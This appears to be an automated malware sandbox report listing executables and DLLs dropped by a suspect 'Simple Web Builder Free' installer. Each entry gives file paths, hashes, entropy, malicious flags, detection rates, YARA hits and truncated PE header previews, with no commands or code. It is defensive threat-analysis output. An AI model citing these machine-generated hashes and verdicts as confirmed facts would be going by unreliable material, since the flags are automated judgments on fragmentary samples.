File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146090
Entropy (8bit):7.982011327302058
Encrypted:false
SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
MD5:0D69DD3893505245669619A06840C2FE
SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768474738650573
Encrypted:false
SSDEEP:49152:5nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHj:AWqlkLESgCRE/vhOjb05efd6e/oXHj
MD5:4CB334999B6534133C4FD522E3768CA1
SHA1:0B90F89CE4F98CEEDBF8D8BC234BEB8F2B90CBF5
SHA-256:B3971C2E1B49E2F113202237604F2799357FD1B70A6432C7EFAC3D3E075A3792
SHA-512:126058F99249F25F224CB2B7513A867C3FA4DEA186E33A4BDE3E073FBB167024C379D7CD3E1B8199423BBF57747858C42408A27F7C5D9D490A2A7451C1848AF8
Malicious:true
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....I.....@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):175104
Entropy (8bit):6.135102131058025
Encrypted:false
SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
MD5:89B400AF781E7D55812A77260DC1D9C8
SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.7684781715563425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:WnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH+:FWqlkLESgCRE/vhOjb05efd6e/oXH+
                                                                                                                          MD5:BCC38593B03EE04D072E36C9513BCF54
                                                                                                                          SHA1:23C84983EAB71EFBC7615B0E60A67D0D1C3A62D4
                                                                                                                          SHA-256:6B6A921F87E6FCC245DE2BADD36F3276B8A6662BBA129EDE2BE971FCF472FB8C
                                                                                                                          SHA-512:F6C75DDFB5B82466BC8271B4D6BA2B2AAC093F7F67C92C4AB0370C2FF15793BBC62170FC891836BB2B30EAC431F2302CC8B75AA6BA77E974F2F85FCC5A693241
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):176200
                                                                                                                          Entropy (8bit):6.647007817777345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                                                                          MD5:6896DC57D056879F929206A0A7692A34
                                                                                                                          SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                                                                          SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                                                                          SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):68552
                                                                                                                          Entropy (8bit):6.1042544770100395
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                          MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                          SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                                                                          SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                          SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125637
                                                                                                                          Entropy (8bit):6.2640431186303145
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1888210
                                                                                                                          Entropy (8bit):6.979353627074183
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:0HZ2IxEvbn0MdESx+ZFehvnATV3oR6GKIlb/xBxlKtIH6/qKsTRBEqkF71elDPIL:0JxEvnE6oUhPATV4RsIb/xBxlKe27Qu
                                                                                                                          MD5:07CCE29CBE21CC01D130BF40060D8B18
                                                                                                                          SHA1:5E49A0AE78D0BF2A27FC24EED50DFFF8EB0075A4
                                                                                                                          SHA-256:D26C4430C9ECBD4B6EDBD64EE5DD907665AFE7E44B35EFCE1EFAF7C943C2C8E9
                                                                                                                          SHA-512:F50FD421DE83E078AC1FFF2DE2DEC9602AF6C27BF987FF7DFFC58C9121DAF38E922675573D2005A2097796229185EB5E96736AE8A5FB8A70B89E8343005B10F3
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Simple Web Builder Free\is-L72V0.tmp, Author: Joe Security
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125637
                                                                                                                          Entropy (8bit):6.2640431186303145
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):717985
                                                                                                                          Entropy (8bit):6.51488668649805
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+LIq5MRxyFy:SPcYn5c/rPx37/zHBA6pFptZ1CECqMRz
                                                                                                                          MD5:0789C3F22DFED777F74C9221B9F15DC4
                                                                                                                          SHA1:E02D879A7D295729D4D312714DD961389292EF93
                                                                                                                          SHA-256:CB7F66BBD879BC30BA3344B0E6F7AB30433A09D34453880034C16B02733D30B3
                                                                                                                          SHA-512:13E881364CD7E4920728684EC85B5BB81861C16DF9373B0A2830C07476DEA21A9C437C51373719C456AA5DD751058AD29507F58CE7FF5E52E137EE9745FC2EC7
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105784
                                                                                                                          Entropy (8bit):6.258144336244945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                          MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                          SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                          SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                          SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40974
                                                                                                                          Entropy (8bit):6.485702128133584
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                          MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                          SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                          SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                          SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105784
                                                                                                                          Entropy (8bit):6.258144336244945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                          MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                          SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                          SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                          SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125637
                                                                                                                          Entropy (8bit):6.2640431186303145
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40974
                                                                                                                          Entropy (8bit):6.485702128133584
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                          MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                          SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                          SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                          SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):176200
                                                                                                                          Entropy (8bit):6.647007817777345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                                                                          MD5:6896DC57D056879F929206A0A7692A34
                                                                                                                          SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                                                                          SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                                                                          SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):68552
                                                                                                                          Entropy (8bit):6.1042544770100395
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                          MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                          SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                                                                          SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                          SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):1888210
                                                                                                                          Entropy (8bit):6.979353805786148
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:lHZ2IxEvbn0MdESx+ZFehvnATV3oR6GKIlb/xBxlKtIH6/qKsTRBEqkF71elDPIL:lJxEvnE6oUhPATV4RsIb/xBxlKe27Qu
                                                                                                                          MD5:7BFD8C9EBE20C4BF0BED7F74A74E8646
                                                                                                                          SHA1:6098711FD405855097A78442A8A195E04BFAB1CD
                                                                                                                          SHA-256:BA6625BECE4E980DE77E555B8626F63BEC81CA9BA3E40701F7ED201DB25153FD
                                                                                                                          SHA-512:8DF13158A2D806A6E2D49CECA8DEE411E07F96F63876DBD64E6ED3424765062312AC1C4E7EB0EB7683443240B9B52022F8977094063A1509395A6C45BEEC6893
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.i^..........'.................0.............@..................................................................................................................................................................................................text............................... ..`.rdata.. 1.......@..................@..@.data....T... ...0... ..............@....rsrc................P..............@..@.short1..............P..............`...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:InnoSetup Log Simple Web Builder Free, version 0x30, 4769 bytes, 364339\user, "C:\Users\user\AppData\Local\Simple Web Builder Free"
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4769
                                                                                                                          Entropy (8bit):4.745578697495794
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:GidWl386pKDN5n9v+eOIhJyT4cVSQs0Ln8/i:VdWl3dpKfoHIhQ8cVSQ1n86
                                                                                                                          MD5:227E7867C240FC9571A4A204BB1E8D81
                                                                                                                          SHA1:F294C3069D8B9506C83977C7B028CD2AE1648F80
                                                                                                                          SHA-256:4972C716DF440C3C1C28FD40E1DB61709056A90902555FA714DD15B1F13D8C65
                                                                                                                          SHA-512:51112BF92B3D5AD9CB8E786A1A4DCE6FF0A2BF73DAD0F58490650F67AC7F85F0EDD99D58263ED8BEC8267AD302108C61AEA453DE5AB43DCA7EDC2D3FF808D97A
                                                                                                                          Malicious:false
                                                                                                                          Preview:Inno Setup Uninstall Log (b)....................................Simple Web Builder Free.........................................................................................................Simple Web Builder Free.........................................................................................................0...........%...............................................................................................................|............?.+......V....364339.user5C:\Users\user\AppData\Local\Simple Web Builder Free...........4.(./.. .....K......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):717985
                                                                                                                          Entropy (8bit):6.51488668649805
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+LIq5MRxyFy:SPcYn5c/rPx37/zHBA6pFptZ1CECqMRz
                                                                                                                          MD5:0789C3F22DFED777F74C9221B9F15DC4
                                                                                                                          SHA1:E02D879A7D295729D4D312714DD961389292EF93
                                                                                                                          SHA-256:CB7F66BBD879BC30BA3344B0E6F7AB30433A09D34453880034C16B02733D30B3
                                                                                                                          SHA-512:13E881364CD7E4920728684EC85B5BB81861C16DF9373B0A2830C07476DEA21A9C437C51373719C456AA5DD751058AD29507F58CE7FF5E52E137EE9745FC2EC7
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
